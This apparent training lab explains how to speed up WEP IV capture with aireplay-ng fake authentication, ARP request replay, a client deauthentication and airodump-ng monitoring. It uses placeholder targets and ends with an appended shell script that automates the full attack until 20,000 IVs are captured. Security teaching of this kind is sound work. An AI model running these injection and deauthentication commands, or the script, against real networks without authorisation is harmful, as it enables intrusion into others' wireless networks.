Accelerate WEP IV Capture with an ARP Replay Attack

Beginner

Introduction

Welcome to this lab on accelerating WEP IV capture. WEP (Wired Equivalent Privacy) is an obsolete and insecure Wi-Fi security protocol. Its main weakness lies in the way it uses Initialization Vectors (IVs): every data frame is encrypted with RC4 under the secret key prefixed by a 24-bit IV that is sent in the clear, and the key-recovery attacks implemented in aircrack-ng are statistical attacks over many captured IVs. To crack a WEP key, an attacker therefore needs to capture a large number of data packets, each carrying an IV; it is the number of distinct IVs, not the raw packet count, that decides success.

Passively waiting for a network to generate enough traffic to capture tens of thousands of IVs can take hours or even days. To overcome this, we can use an active technique called an ARP Replay Attack (aireplay-ng calls it "ARP request replay"). This attack involves capturing an encrypted ARP request from the network and re-injecting (or "replaying") it back, unchanged, over and over. Because WEP has no replay protection, the Access Point (AP) accepts every copy as a fresh broadcast from an associated client and retransmits it to the wireless side, encrypting each retransmission with a new IV; the host that owns the queried address also answers each copy with an ARP reply, which the AP forwards the same way. The result is a large volume of new packets, each with a new IV, allowing us to collect the necessary data in minutes.

In this lab, you will use the aireplay-ng tool from the Aircrack-ng suite to perform an ARP replay attack. We will assume you have already put your wireless card into monitor mode.

Perform a Fake Authentication with aireplay-ng -1

In this step, you will perform a "fake authentication" with the target Access Point (AP). Before we can inject any packets into the network, our device needs to be associated with the AP: an AP discards data frames whose source MAC is not associated (and often answers them with a deauthentication), so replayed packets would simply be dropped. The fake authentication attack establishes this association, making the AP believe we are a legitimate client. Two caveats apply. The MAC you authenticate with (-h below) must be the address your card actually uses, otherwise the AP's ACKs go to a station that does not exist and aireplay-ng cannot tell whether injection works; if you want a different address, change it with macchanger before entering monitor mode. And this attack only works against open-system authentication; a WEP network configured for shared-key authentication needs aireplay-ng's shared-key fake authentication instead, which is outside this lab.

For this lab, we will use the following simulated target information:

  • Interface: wlan0mon
  • ESSID (Network Name): labex-wep
  • BSSID (AP MAC Address): 00:11:22:33:44:55
  • Our MAC Address: 00:C0:CA:A1:B2:C3

Now, execute the following command in your terminal to perform the fake authentication. -1 selects the fake authentication attack, and the value after it is the reassociation timing in seconds: 0 means authenticate once and do not re-associate. -e specifies the ESSID, -a the BSSID, and -h our source MAC address. If the AP drops idle stations after a while, the Aircrack-ng documentation's alternative is to keep the association alive with a long timing and periodic keep-alives, for example -1 6000 -o 1 -q 10.

sudo aireplay-ng -1 0 -e labex-wep -a 00:11:22:33:44:55 -h 00:C0:CA:A1:B2:C3 wlan0mon

In a real environment, you would see output indicating the progress. A successful execution will show messages like "Authentication successful" and "Association successful". Due to the limitations of the lab environment, the command may not produce the full, real-world output, but executing it is a crucial first step.

12:34:56  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
12:34:56  Sending Authentication Request (Open System) [ACK]
12:34:57  Authentication successful
12:34:57  Sending Association Request [ACK]
12:34:57  Association successful :-) (AID: 1)

With the association established, we can proceed to the main attack.

Start the ARP Replay Attack with aireplay-ng -3

In this step, you will launch the ARP replay attack. This attack, specified by the -3 flag in aireplay-ng, listens for ARP request packets on the network. It cannot decrypt them, but an encrypted ARP request is easy to recognise anyway: it has a fixed, small size and is addressed to the broadcast MAC. Once it captures one, it will begin re-injecting it to generate a flood of new IVs.

It's important to run this attack in its own terminal window, as it will run continuously. Please open a new terminal for this command. You can do this by clicking the + icon in the terminal tab bar.

In the new terminal, execute the following command. The -3 flag initiates the ARP replay attack, -b specifies the target BSSID (the AP), and -h specifies our source MAC address (the one we used for authentication).

sudo aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:C0:CA:A1:B2:C3 wlan0mon

After running the command, aireplay-ng will start listening. The output will initially show that it is waiting for an ARP packet.

Saving ARP requests in replay_arp-1234-567890.cap
You should also start airodump-ng to capture replies.
Read 0 packets (got 0 ARP requests, 0 ACKs), sent 0 packets...(0 pps)

The tool is now passively listening. It needs to capture at least one ARP request to begin the replay process. Keep in mind that aireplay-ng can only see, and only inject on, the channel the card is currently tuned to; in practice it is better to have airodump-ng (next step) running first, because its -c option is what locks the card to the AP's channel. In the next step, we will set up a monitoring tool to watch our progress. Leave this terminal running.

Monitor the IV Capture with airodump-ng

In this step, you will use airodump-ng to monitor the network and, more importantly, to see the results of your ARP replay attack. airodump-ng will capture all the packets generated by the attack and save them to a file. The number of captured data packets (IVs) is the key metric of success.

This command also needs to run continuously in its own terminal. Please open a third terminal window by clicking the + icon again.

In this new terminal, run the following airodump-ng command.

  • --bssid: Focuses the capture on our target AP.
  • -c 6: Locks the card to channel 6 (assuming the AP is on this channel; check the CH column of an unfiltered airodump-ng run if unsure). This matters beyond filtering: a card that is channel hopping cannot inject reliably, so the ARP replay from the other terminal depends on this lock.
  • --write wep_capture: Tells airodump-ng to save the captured packets into files with the prefix wep_capture (a .cap file plus CSV summaries).
  • wlan0mon: The monitor mode interface to use.

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write wep_capture wlan0mon

After running the command, you will see the airodump-ng interface. Pay close attention to the #Data column for our target BSSID. This number represents the count of captured IVs.

 CH  6 ][ Elapsed: 0 s ][ 2023-10-27 10:10

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10        0    0   6  54   WEP  WEP         labex-wep

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Initially, the #Data count will be zero or very low. Once the aireplay-ng attack (from Step 2) captures an ARP packet and starts injecting, you will see this number increase very rapidly. Leave this terminal running and proceed to the next step to understand the process.

Understand How ARP Replay Generates Injectable Traffic

This step is conceptual; you do not need to run any new commands. The goal is to understand what is happening across your three terminal windows.

In a real-world scenario, you would now wait for a legitimate client on the network to send an ARP request (e.g., when it first joins the network or tries to find another device). If no ARP request shows up after a few minutes, the usual remedy from the Aircrack-ng documentation is to deauthenticate one associated client from another terminal (aireplay-ng -0 1 -a <BSSID> -c <client MAC> wlan0mon); when it reconnects it typically sends an ARP request, which your aireplay-ng -3 process captures.

  1. Capture: Your aireplay-ng -3 process (in the second terminal) is waiting for this to happen. Once it captures an ARP packet, its output will change. It will indicate that it has read a packet and is now saving it.

    Read 147 packets (got 1 ARP request), sent 0 packets...(0 pps)
    
  2. Replay: Immediately after capturing the ARP packet, aireplay-ng will start re-injecting it into the network. You will see the "sent" counter increase rapidly.

    Read 250 packets (got 1 ARP request), sent 86 packets...(102 pps)
    
  3. Generate: The AP receives each replayed ARP request. Because WEP has no replay protection, it treats every copy as a new broadcast from an associated client and retransmits it to the wireless network, encrypting each retransmission with a new, unique IV. The host whose address is being resolved also answers every copy with an ARP reply, which the AP forwards, again under a new IV.

  4. Monitor: Your airodump-ng process (in the third terminal) captures all these replies from the AP. You will see the #Data column for your target network start to skyrocket, often increasing by hundreds per second.

This feedback loop is the core of the attack. We use one captured ARP packet to trick the AP into generating thousands of new packets for us, dramatically accelerating the IV collection process.

Stop the Attack After Collecting over 20000 IVs

In this final step, you will stop the attack once you have collected a sufficient number of IVs. For cracking a WEP key with aircrack-ng's default PTW attack, roughly 20,000 IVs are often enough for a 64-bit key (40-bit secret) and 40,000 to 85,000 for a 128-bit key (104-bit secret). The number depends on the key length and on chance, not on how "strong" the key is: WEP's weakness is in how it uses the cipher, so a random key falls just as fast as a guessable one.

For this lab, we will stop once the count exceeds 20,000.

Watch the #Data column in your airodump-ng terminal (the third terminal you opened). Once the value is greater than 20,000, you can stop the capture and the attack.

To stop the processes, go to each of the two running terminals (aireplay-ng and airodump-ng) and press Ctrl+C. Stop aireplay-ng first so that no more traffic is injected after the capture ends; airodump-ng flushes and closes its files when interrupted, so nothing already captured is lost either way.

After stopping the processes, the airodump-ng command will have created several files in your ~/project directory. The most important one is the capture file, which ends in .cap. Let's list the files to confirm it was created.

ls -l

You should see output similar to this, confirming the presence of wep_capture-01.cap.

-rw-r--r-- 1 root root 2450000 Oct 27 10:15 wep_capture-01.cap
-rw-r--r-- 1 root root   78123 Oct 27 10:15 wep_capture-01.csv
...

This .cap file contains all the IVs you have collected and is now ready to be used with aircrack-ng to crack the WEP key.
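The whole procedure above (fake authentication, ARP request replay, the airodump-ng capture, and stopping once the IV count passes 20,000) driven from one script, as an added example that is not part of this lab or of the Aircrack-ng suite. It assumes aircrack-ng is installed, wlan0mon is already in monitor mode, the lab's placeholder BSSID, ESSID and MAC are replaced with real values (each can be overridden through an environment variable of the same name), and that it is run as root. The file name wep_arp_replay.sh and all function names are my own. The part worth studying is iv_count, which reads the "# IV" column from the CSV that airodump-ng writes next to the .cap file, so the stop condition no longer depends on watching the #Data column by eye.

```bash
#!/bin/sh
# Added example, not part of the LabEx lab or the Aircrack-ng suite. Runs the
# lab's three terminals (airodump-ng capture, aireplay-ng -1 fake auth,
# aireplay-ng -3 ARP request replay) from one process and stops automatically
# once airodump-ng's "# IV" column for the target passes TARGET_IVS.
# Assumptions: aircrack-ng installed, IFACE already in monitor mode, the
# placeholder BSSID/ESSID/MAC replaced with real values, run as root, e.g.
#   sudo ./wep_arp_replay.sh run
set -u

IFACE="${IFACE:-wlan0mon}"
ESSID="${ESSID:-labex-wep}"
BSSID="${BSSID:-00:11:22:33:44:55}"
OURMAC="${OURMAC:-00:C0:CA:A1:B2:C3}"
CHANNEL="${CHANNEL:-6}"
PREFIX="${PREFIX:-wep_capture}"
TARGET_IVS="${TARGET_IVS:-20000}"
dump_pid=""; replay_pid=""

# Print the "# IV" value airodump-ng has recorded for a BSSID in the CSV it
# writes alongside the .cap file. The AP table comes first; its header reads
# "BSSID, First time seen, ..., # beacons, # IV, LAN IP, ...", so the IV count
# is field 11. The client table that follows starts with "Station MAC" and is
# skipped. Prints 0 if the file or the AP row does not exist yet.
iv_count() {
    _csv="$1"; _bssid=$(printf '%s' "$2" | tr 'a-f' 'A-F')
    [ -r "$_csv" ] || { echo 0; return 0; }
    awk -F', *' -v b="$_bssid" '
        /^Station MAC/   { exit }
        toupper($1) == b { print $11 + 0; found = 1; exit }
        END              { if (!found) print 0 }
    ' "$_csv"
}

stop_all() {
    # SIGINT is what Ctrl+C sends in the lab. Injector first, so nothing is
    # generated after the capture file has been closed.
    for p in "$replay_pid" "$dump_pid"; do
        [ -n "$p" ] && kill -INT "$p" 2>/dev/null
    done
    wait 2>/dev/null
}

run_attack() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }

    # 1. Capture, locked to the AP's channel: a channel-hopping card cannot inject.
    airodump-ng --bssid "$BSSID" -c "$CHANNEL" --write "$PREFIX" "$IFACE" >/dev/null 2>&1 &
    dump_pid=$!
    csv=""; i=0
    while [ -z "$csv" ] && [ "$i" -lt 10 ]; do
        sleep 1; i=$((i + 1))
        csv=$(ls -t "$PREFIX"-[0-9][0-9].csv 2>/dev/null | head -n 1)
    done
    [ -n "$csv" ] || { echo "no CSV from airodump-ng; is $IFACE in monitor mode?" >&2; stop_all; return 1; }

    # 2. Fake authentication, once (timing 0). Judge success by the output text.
    out=$(aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$OURMAC" "$IFACE" 2>&1)
    printf '%s\n' "$out"
    case "$out" in
        *"Association successful"*) ;;
        *) echo "fake auth failed: wrong channel, MAC filtering, or $OURMAC is not the card's real MAC" >&2
           stop_all; return 1 ;;
    esac

    # 3. ARP request replay in the background; its packet counters go to a log.
    aireplay-ng -3 -b "$BSSID" -h "$OURMAC" "$IFACE" >"$PREFIX.replay.log" 2>&1 &
    replay_pid=$!

    # 4. Poll the CSV until the IV count passes the target, then stop both tools.
    while :; do
        sleep 5
        count=$(iv_count "$csv" "$BSSID")
        printf 'IVs: %s / %s\n' "$count" "$TARGET_IVS"
        [ "$count" -gt "$TARGET_IVS" ] && break
        kill -0 "$replay_pid" 2>/dev/null || { echo "aireplay-ng exited; see $PREFIX.replay.log" >&2; break; }
    done
    stop_all
    echo "done: ${csv%.csv}.cap is ready for aircrack-ng"
}

main() {
    case "${1:-}" in
        run)   run_attack ;;
        count) iv_count "${2:?usage: $0 count <airodump-ng csv>}" "$BSSID" ;;
        *)     echo "usage: $0 run | count <airodump-ng csv>" ;;
    esac
}
main "$@"
```

Run it as `sudo ./wep_arp_replay.sh run`; `./wep_arp_replay.sh count wep_capture-01.csv` prints the IV count from an existing capture without touching the card. The script judges fake authentication by the "Association successful" text rather than the exit status, and it treats an early exit of aireplay-ng -3 as a reason to stop polling and look at the log instead of spinning forever.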

Summary

In this lab, you have successfully learned how to perform one of the most effective attacks against WEP-protected networks.

You started by performing a fake authentication with aireplay-ng -1 to associate your device with the target Access Point. Then, you launched the core of the lab, the ARP replay attack using aireplay-ng -3, which listens for and replays ARP packets. You also set up airodump-ng to monitor the network and capture the resulting traffic.

You learned how this attack creates a feedback loop, tricking the AP into generating thousands of new data packets (IVs) per minute. Finally, you stopped the attack after collecting a sufficient number of IVs, resulting in a .cap file ready for cracking. This active technique is vastly more efficient than passively waiting for network traffic. The next logical step, which is outside the scope of this lab, would be to use aircrack-ng on the wep_capture-01.cap file to recover the WEP key.